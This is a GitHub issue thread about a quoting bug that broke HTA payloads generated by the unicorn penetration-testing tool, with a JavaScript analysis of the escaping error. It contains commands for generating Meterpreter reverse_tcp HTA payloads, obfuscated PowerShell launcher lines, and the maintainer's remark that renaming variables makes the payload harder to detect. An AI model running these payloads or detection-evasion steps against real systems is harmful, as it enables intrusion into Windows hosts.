
.hta's Broken in latest unicorn? #34

Closed
decidedlygray opened this issue Mar 7, 2017 · 4 comments
Comments

@decidedlygray

I'm no longer able to generate working .hta's using unicorn. I was wondering if you could confirm this is a legitimate issue, or is this just me?

I've generated working payloads on my setup before pulling the latest from GitHub. The problem appears to be that the .hta generated has some sort of syntax error, maybe from unbalanced quotes?

Steps to Recreate

1. Clone the latest unicorn, or git pull to the latest:

   ```
   git clone https://github.com/trustedsec/unicorn.git
   ```

   or, if you have it, update to the latest:

   ```
   git pull
   ```

2. Generate an .hta file (note: no errors show while generating; the problem is not with generating the payload, it appears to be with the syntax of the script or PowerShell generated):

   ```
   python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta
   ```

3. Launch the .hta file on a Windows host, and observe the error:

   (screenshot of the script error dialog)

Temporary Workaround

Reverting to version 2.4.2 appears to fix the issue:

```
git clone https://github.com/trustedsec/unicorn.git
git checkout tags/2.4.2
python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta
```

Additional Details

I believe the issue is the quoting right before the larger base64 part of the payload (right before "STUFF" in this comparison, for example). Reverting to 2.4.2, right before commit 8fc0a81, appears to resolve the error message and allow proper payload execution.

2.4.2:

```
a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv 77 -;sv II ec;sv Z ((gv 77).value.toString()+(gv II).value.toString());powershell (gv Z).value.toString() "STUFF
```

2.4.3:

```
a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv CY -;sv 5S ec;sv n ((gv CY).value.toString()+(gv 5S).value.toString());powershell (gv n).value.toString() 'STUFF
```

So it could be related to this commit: 8fc0a81
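As an added example (not code from unicorn or from any participant in this issue), the following JavaScript models the difference between the two launcher lines quoted above. HTA script blocks run under JScript, whose single-quoted string literals follow the same escaping rules as JavaScript, so a small scanner can show exactly where each literal closes. The example assumes, from those two lines alone, a quoting routine that doubles backslashes but leaves single quotes untouched (an inference, not unicorn's actual code); the constant and function names are invented for illustration, and the payload is replaced by the placeholder STUFF as in the report.

```javascript
// Added example, not unicorn's code. It reproduces the launcher quoting
// failure from the 2.4.2 / 2.4.3 lines in the issue and shows the escaping
// that avoids it. The payload blob is the placeholder STUFF, as in the report.

// Inner commands as cmd.exe would receive them (runtime strings, so the "\\"
// in the issue's JScript source is one backslash here). Copied from the issue.
const INNER_242 = '%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv 77 -;sv II ec;' +
  'sv Z ((gv 77).value.toString()+(gv II).value.toString());' +
  'powershell (gv Z).value.toString() "STUFF';
const INNER_243 = '%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv CY -;sv 5S ec;' +
  'sv n ((gv CY).value.toString()+(gv 5S).value.toString());' +
  'powershell (gv n).value.toString() \'STUFF';

// Quoting as the 2.4.3 output implies (assumption inferred from the two quoted
// lines, not unicorn's real routine): backslashes doubled, single quotes left bare.
function quoteBackslashOnly(s) {
  return "'" + s.replace(/\\/g, '\\\\') + "'";
}

// Correct quoting for a JScript/JavaScript single-quoted literal: escape both
// the backslash and the quote character itself.
function quoteSingle(s) {
  return "'" + s.replace(/\\/g, '\\\\').replace(/'/g, "\\'") + "'";
}

// Build the launcher statement with the chosen quoting routine.
function buildRunLine(inner, quote) {
  return 'a.run(' + quote(inner) + ');';
}

// Minimal scanner for a single-quoted literal starting at src[start] === "'".
// Honours backslash escapes the way the script engine would. Returns the
// decoded value and the index just past the closing quote, or null if the
// literal never closes.
function scanSingleQuoted(src, start) {
  if (src[start] !== "'") return null;
  let value = '';
  for (let i = start + 1; i < src.length; i++) {
    const c = src[i];
    if (c === '\\') {
      if (i + 1 >= src.length) return null;
      value += src[i + 1]; // only \\ and \' are produced by the quoters above
      i++;
    } else if (c === "'") {
      return { value: value, end: i + 1 };
    } else {
      value += c;
    }
  }
  return null;
}

// Check that "a.run('...');" is one well-formed statement: the literal must
// close exactly where ");" begins and must decode back to the intended command.
// Anything left between the closing quote and ");" is stray text the script
// engine will reject.
function checkRunLine(line, intended) {
  const lit = scanSingleQuoted(line, 'a.run('.length);
  if (lit === null) return { ok: false, rest: '', reason: 'string literal never closes' };
  const rest = line.slice(lit.end);
  if (rest !== ');') return { ok: false, rest: rest, reason: 'literal closed early, leaving stray text' };
  if (lit.value !== intended) return { ok: false, rest: rest, reason: 'decoded command differs from intended' };
  return { ok: true, rest: rest, reason: 'well-formed' };
}

// Summarise the four combinations for inspection.
function summary() {
  return {
    v242_backslashOnly: checkRunLine(buildRunLine(INNER_242, quoteBackslashOnly), INNER_242),
    v243_backslashOnly: checkRunLine(buildRunLine(INNER_243, quoteBackslashOnly), INNER_243),
    v242_quoteSingle: checkRunLine(buildRunLine(INNER_242, quoteSingle), INNER_242),
    v243_quoteSingle: checkRunLine(buildRunLine(INNER_243, quoteSingle), INNER_243),
  };
}

console.log(summary());
```

The 2.4.2 command contains no single quote, so doubling backslashes alone is enough; the 2.4.3 command ends in `'STUFF`, so the same routine closes the literal before the payload and leaves `STUFF');` outside it, which is the shape of error the reporters saw. Escaping the quote as well makes both versions round-trip.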

@CarterMcKelvain

I am having the exact same issue, except on mine I receive four different script errors, in the same window as you have shown above, all related to ')'.

@trustedsec
Collaborator

Thanks for the report, will take a peek today and get a fix out.

@trustedsec
Collaborator

trustedsec commented Mar 8, 2017

Definitely a quoting issue: with the new obfuscation technique introduced, single quotes are injected into the command. I'll figure out a workaround.

@trustedsec
Collaborator

Thanks for the report, I've just released version 2.6 which fixes the escaping issue. I also decided to take a first stab at obfuscation of the HTA attack vector. I know things such as WScript.Shell could pop, so I've randomized all of that and the variable names. Should be much harder to detect. Thanks for the report and let me know if there's anything else!

-Dave
